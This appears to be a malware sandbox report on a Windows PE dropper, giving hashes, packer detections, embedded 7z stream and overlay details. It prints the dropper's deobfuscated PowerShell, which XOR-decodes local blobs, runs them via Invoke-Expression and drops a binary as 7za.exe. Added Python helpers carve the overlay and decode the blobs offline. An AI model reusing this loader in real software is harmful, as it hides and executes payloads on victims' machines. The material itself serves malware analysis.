Malicious

dc5b33705ec2d25b3c96f9075fc88d24

PE Executable | MD5: dc5b33705ec2d25b3c96f9075fc88d24 | Size: 5.35 MB | application/x-dosexec

Infection Chain
Characteristics
MD5: dc5b33705ec2d25b3c96f9075fc88d24
SHA-1: 9a078dd23ea1858dc551544e3204b45c8a7b7896
SHA-256: fce5f95d9a8d8a4003af3fd63365d5f3a7746536d054d290534674fa8ef4b844
SHA-384: e7d452ac6c35d6a75493f39fa855b01ed7fac758fa605e857ba454747d60de8ce31e376a878eaa416cd8527f634d6aa6
SHA-512: 8c7e74d34d6e0fff55b7205f6e8130f074eea421f04f005d227b845509d12165c659d7aa5bb246c559d157d60ceb41e882059cfa39f58466fad4fb79b1c84e91
SSDeep: 98304:1gwR9CnkgpzeHXDmSZwuK5oGUhnCUwQRhNJrZ3tVjRSt/Cgu1i782PKlVQSxRfs:1guCtpzMzmSZwPnAwMj/wtKgMu2ET
TLSH: 1446334072A959F5F15E1E7485592B6BDAE51E21073A43CBEB8738849EB13C3933A3C3

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
UPolyX 0.3 -> delikon
File Structure
7z-stream @ 0x00022EA1.7z
Malicious
data1.bin
data2.bin
data3.bin
[Deobfuscated PS]
Malicious
Overlay_e81884ef.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1049
ID:1049-preview.png
ID:0002
ID:1049
ID:0003
ID:1049
ID:0004
ID:1049
RT_GROUP_CURSOR4
ID:0000
ID:1049
ID:0065
ID:1049
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Information
Info: PE Detect: PeReader OK (file layout)
Info: Overlay extracted: Overlay_e81884ef.bin (5206951 bytes)
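Added example, not code from the report or from the analysis tooling behind it: a Python check for the two structural findings above, the extracted overlay and the 7z stream listed under File Structure. overlay_offset walks the section table and returns the first byte past the last section's raw data, which is where the overlay begins; find_7z_streams scans for the six-byte 7z signature and keeps only hits whose StartHeaderCRC (CRC32 over the 20 bytes that follow it, per the 7z format) verifies, so a stray signature match inside a section is not carved as an archive. The PE image and the 7z stream it runs on are constructed inline for the self-test; the sample itself is not included.

```python
import struct
import zlib

SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"   # signature that opens every 7z archive
START_HEADER_LEN = 32                  # magic(6) version(2) StartHeaderCRC(4) NextHeaderOffset(8) NextHeaderSize(8) NextHeaderCRC(4)


def overlay_offset(pe):
    """Return the file offset where the overlay starts: the end of the last
    section's raw data (at least the end of the section table)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # FileHeader.SizeOfOptionalHeader
    sec_table = e_lfanew + 24 + opt_size
    end = sec_table + 40 * nsec
    for i in range(nsec):
        # +16 in a section header is SizeOfRawData, followed by PointerToRawData
        raw_size, raw_ptr = struct.unpack_from("<II", pe, sec_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(pe))


def find_7z_streams(blob):
    """Return (offset, total_length) for every 7z start header in blob whose
    StartHeaderCRC verifies. total_length = 32 + NextHeaderOffset + NextHeaderSize,
    i.e. the number of bytes to carve."""
    hits = []
    pos = blob.find(SEVENZ_MAGIC)
    while pos != -1:
        hdr = blob[pos:pos + START_HEADER_LEN]
        if len(hdr) == START_HEADER_LEN:
            start_crc = struct.unpack_from("<I", hdr, 8)[0]
            if zlib.crc32(hdr[12:32]) == start_crc:
                next_off, next_size = struct.unpack_from("<QQ", hdr, 12)
                hits.append((pos, START_HEADER_LEN + next_off + next_size))
        pos = blob.find(SEVENZ_MAGIC, pos + 1)
    return hits


def build_7z_stream():
    """Constructed 7z stream with a valid start header (packed data and the
    property header are placeholders, only the framing is real)."""
    packed = b"P" * 40
    next_hdr = b"\x01\x04\x06\x00\x00\x00\x00\x00"
    tail = struct.pack("<QQI", len(packed), len(next_hdr), zlib.crc32(next_hdr))
    start = SEVENZ_MAGIC + b"\x00\x04" + struct.pack("<I", zlib.crc32(tail)) + tail
    return start + packed + next_hdr


def build_sample():
    """Constructed PE32 image: two 0x200-byte sections, a stray 7z signature
    without a valid header in .text, and an overlay that holds a real stream."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    file_hdr = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\x00" * (0xE0 - 2)                 # PE32 magic, rest zeroed
    sec_hdrs = b""
    for name, raw_ptr in ((b".text", 0x200), (b".rsrc", 0x400)):
        sec_hdrs += name.ljust(8, b"\x00") + struct.pack(
            "<IIIIIIHHI", 0x200, raw_ptr, 0x200, raw_ptr, 0, 0, 0, 0, 0x40000040)
    headers = (dos + file_hdr + opt_hdr + sec_hdrs).ljust(0x200, b"\x00")
    text = SEVENZ_MAGIC.ljust(0x200, b"\x00")      # magic only: must be rejected by the CRC gate
    rsrc = b"\xAA" * 0x200
    overlay = b"\xCC" * 0x10 + build_7z_stream()   # stream sits 0x10 bytes into the overlay
    return headers + text + rsrc + overlay


SAMPLE = build_sample()

if __name__ == "__main__":
    start = overlay_offset(SAMPLE)
    print("overlay at 0x%X, %d bytes" % (start, len(SAMPLE) - start))
    for off, length in find_7z_streams(SAMPLE):
        print("7z stream @ 0x%08X, %d bytes" % (off, length))
```

Run the two functions over the real sample's bytes to check the report's figures: the overlay length should come out at 5206951 and a stream hit is expected at 0x00022EA1 if its start header is intact. A stream that the analysis tool reported from the signature alone but whose StartHeaderCRC does not verify is deliberately not returned here; relax the CRC gate only after looking at the header by hand.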

Artefacts
Deobfuscated PowerShell (reflowed from the single-line extraction; the deobfuscator printed the % operator by its token name, -Rem, which is restored below; [File] and [Encoding] are System.IO.File and System.Text.Encoding, so the script as shown resolves only with the matching using namespace directives or accelerators in the dropper's own environment; quoted member names such as ::"ReadAllBytes" are an obfuscation idiom that PowerShell resolves normally):

@({ Write-Output "off%" } )[1]    # indexes past the end of a one-element array: yields $null, a decoy

function encode($data, [int] $key) {
    $step = ($key % 10) + 1          # per-byte key increment; for 4706 this is 7
    $len = 0
    return $data | ForEach-Object {
        $key = ($key % 255) + 1      # fold the running key into 1..255 before use
        $_ -bxor $key                # emit the XORed byte
        $key += $step
        $len                         # left as emitted by the deobfuscator; a bare $len would push a 0 into the output after every byte, so treat this line as a deobfuscation artefact
    }
}

if (Test-Path "data5.bin" -PathType "Leaf") {
    $binaryData  = [File]::"ReadAllBytes"("data5.bin")
    $encodedData = encode -data $binaryData -key 4706
    Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData))           # decoded text is run in-process
}

if (Test-Path "data.bin") {
    $binaryData  = [File]::"ReadAllBytes"("data.bin")
    $encodedData = encode -data $binaryData -key 4706
    & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData)))  # same effect via ScriptBlock.Create
    Start-Sleep -Seconds 3
}

$binaryData  = [File]::"ReadAllBytes"("data1.bin")
$encodedData = encode -data $binaryData -key 4706
[File]::"WriteAllBytes"("7za.exe", $encodedData)                               # decoded data1.bin is dropped under the 7-Zip console binary's name
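Added example, not part of the report or of the dropper: a Python re-implementation of the encode routine above, so data.bin, data1.bin and data5.bin can be decoded offline instead of letting the PowerShell Invoke-Expression them. The key schedule and the seed 4706 are taken from the script; the trailing $len inside ForEach-Object is treated as a deobfuscation artefact and not reproduced. The blobs in the self-test are constructed here by encoding known plaintext with the same routine.

```python
# Added example (not the dropper's code): offline decoder for the rolling-XOR
# scheme in the deobfuscated PowerShell. Assumption: the bare "$len" in the
# ForEach-Object block is an artefact of deobfuscation and emits nothing.

def keystream(seed, length):
    """Mirror the dropper's key schedule: step = (seed % 10) + 1; before each
    byte the key is folded into 1..255 with (key % 255) + 1, used, then
    advanced by step. The key never becomes 0, so every byte is changed."""
    step = (seed % 10) + 1
    key = seed
    for _ in range(length):
        key = (key % 255) + 1
        yield key
        key += step


def xor_decode(data, seed=4706):
    """XOR is its own inverse, so this both encodes and decodes. 4706 is the
    seed the script passes as -key for every blob."""
    return bytes(b ^ k for b, k in zip(data, keystream(seed, len(data))))


def classify(decoded):
    """Cheap triage of a decoded blob: an MZ stub means a PE (the script writes
    data1.bin out as 7za.exe); valid UTF-8 means script text headed for
    Invoke-Expression or ScriptBlock.Create."""
    if decoded[:2] == b"MZ":
        return "pe"
    try:
        decoded.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "binary"


# Constructed stand-ins for the dropper's blobs, encoded with the same routine,
# so the example runs without the real sample.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 28 + b"PE\x00\x00"
FAKE_SCRIPT = b'Write-Host "constructed stage-two script"'
SAMPLE_DATA1 = xor_decode(FAKE_PE)        # plays the role of data1.bin
SAMPLE_DATA5 = xor_decode(FAKE_SCRIPT)    # plays the role of data5.bin


if __name__ == "__main__":
    import sys
    # Usage: python decode.py <encoded blob> <output file>; with no arguments
    # the constructed stand-ins are decoded and classified instead.
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            out = xor_decode(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(out)
        print(sys.argv[1], "->", sys.argv[2], classify(out))
    else:
        for name, blob in (("data1.bin", SAMPLE_DATA1), ("data5.bin", SAMPLE_DATA5)):
            print(name, classify(xor_decode(blob)))
```

If a real data1.bin decoded with this routine does not start with MZ, the dropped script differs from the one shown (a different seed, or the $len line is not an artefact), and the PowerShell should be re-read before trusting the decoder.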

Malware Configuration
No malware configuration was found at this point.
Malicious: dc5b33705ec2d25b3c96f9075fc88d24 > 7z-stream @ 0x00022EA1.7z > setup.cmd
